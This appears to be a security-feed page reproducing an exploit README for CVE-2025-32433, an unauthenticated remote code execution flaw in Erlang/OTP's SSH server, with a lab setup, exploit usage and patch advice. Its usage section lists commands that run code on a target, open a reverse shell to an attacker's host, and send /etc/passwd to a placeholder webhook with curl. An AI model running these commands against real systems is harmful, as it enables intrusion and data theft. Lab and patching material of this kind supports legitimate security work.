Exploit for CVE-2025-32433

April 20, 2025 invoker category_cve

Vulnerability Details

Basic Information

Title Exploit for CVE-2025-32433
Type githubexploit
Published 2025-04-19T21:37:47
Last Seen 2025-04-20T15:04:23
CVSS Score 10.0 (CRITICAL)

CVSS v3 Details

Attack Vector NETWORK
Attack Complexity LOW
Privileges Required NONE
User Interaction NONE
Scope CHANGED
Confidentiality Impact HIGH
Integrity Impact HIGH
Availability Impact HIGH

CVE Information

CVE IDs CVE-2025-32433
CWE
Bulletin Family exploit

Description

# CVE-2025-32433 – Critical Erlang/OTP SSH Vulnerability

![SSH ERLANG EXPLOIT](image.png)

## Overview 🔍

CVE-2025-32433 is a critical vulnerability discovered in Erlang/OTP’s SSH implementation that allows **unauthenticated remote code execution** via specially crafted SSH messages. This severe security flaw enables attackers to execute arbitrary code on affected systems without authentication.

* **What**: Remote Code Execution (RCE) via unauthenticated SSH messages in Erlang/OTP
* **Impact**: Full code execution, potentially as root, over the network
* **Affected**: Any system running an Erlang/OTP-based SSH server
* **Fix**: Upgrade to `OTP-27.3.3`, `OTP-26.2.5.11`, or `OTP-25.3.2.20`
* **Workaround**: Restrict SSH access using firewall rules

## Vulnerability Details ⚠️

Discovered by researchers at Ruhr University Bochum, this vulnerability stems from improper handling of SSH connection protocol messages in Erlang/OTP. It allows attackers to send maliciously crafted messages before authentication is completed, resulting in unauthenticated arbitrary code execution.

If the Erlang SSH daemon is running as root (a common configuration), successful exploitation grants full system control, making it a prime candidate for ransomware deployment, lateral movement through networks, or data exfiltration.

## Affected Versions 🐛

* <= OTP-27.3.2 * <= OTP-26.2.5.10 * <= OTP-25.3.2.19 ## Lab Setup 🖥️ Follow these steps to set up a test environment: 1. **Install Docker and Docker Compose** ```bash sudo apt update sudo apt install apt-transport-https ca-certificates curl gnupg lsb-release curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" sudo apt install docker-ce docker-ce-cli containerd.io sudo docker --version sudo curl -L "https://github.com/docker/compose/releases/download/v2.29.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose sudo chmod +x /usr/local/bin/docker-compose docker-compose --version ``` 2. **Build and Run the Vulnerable Container** ```bash docker build -t erlang-ssh . docker run -d --name erlang-ssh-container -p 2222:2222 -v /home/local.txt:/home erlang-ssh ``` 3. **Set Up as a Service** To run the container as a service that starts automatically: a. Create a systemd service file: ```bash sudo nano /etc/systemd/system/erlang-ssh-vuln.service ``` b. Add the following content: ```bash [Unit] Description=Erlang SSH Vulnerability Lab After=docker.service Requires=docker.service [Service] TimeoutStartSec=0 Restart=always ExecStartPre=-/usr/bin/docker stop erlang-ssh-container ExecStartPre=-/usr/bin/docker rm erlang-ssh-container ExecStart=/usr/bin/docker run --name erlang-ssh-container -p 2222:2222 -v /home/local.txt:/home erlang-ssh ExecStop=/usr/bin/docker stop erlang-ssh-container [Install] WantedBy=multi-user.target ``` c. Enable and start the service: ```bash sudo systemctl daemon-reload sudo systemctl enable erlang-ssh-vuln.service sudo systemctl start erlang-ssh-vuln.service ``` ## Exploit Usage 🚀 The exploit script provides several options for testing and exploiting the vulnerability: ### Basic Syntax: ```bash python exploit.py [options]
“`

### Check Vulnerability:
“`bash
python exploit.py 172.32.33.28 -p 2222 –check
“`

### Execute Command:
“`bash
python exploit.py 172.32.33.28 -p 2222 -c ‘ls -la’
“`

### Get Reverse Shell:
“`bash
python exploit.py 172.32.33.28 -p 2222 –shell –lhost 172.32.36.48 –lport 4444
“`

### Alternative Data Exfiltration:
If direct commands don’t work, you can use webhook-based exfiltration:
“`bash
python exploit.py 172.32.33.28 -p 2222 -c “curl -X POST -d @/etc/passwd WEBHOOKURL”
“`
“`bash
python exploit.py 172.32.33.28 -p 2222 -c “curl -X POST -d @/home/local.txt WEBHOOKURL”
“`

## Mitigation Steps 🛡️

1. **Update Erlang/OTP**:
– Upgrade to `OTP-27.3.3`, `OTP-26.2.5.11`, or `OTP-25.3.2.20`
– These patched versions properly validate SSH protocol messages

2. **Network Controls**:
– Restrict access to SSH services with firewall rules
– Implement network segmentation to isolate critical systems

3. **Monitoring**:
– Deploy intrusion detection/prevention systems to monitor for exploitation attempts
– Enable enhanced logging for SSH connections

Impact Assessment

Base Score 10.0
Severity CRITICAL

View full CVE details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.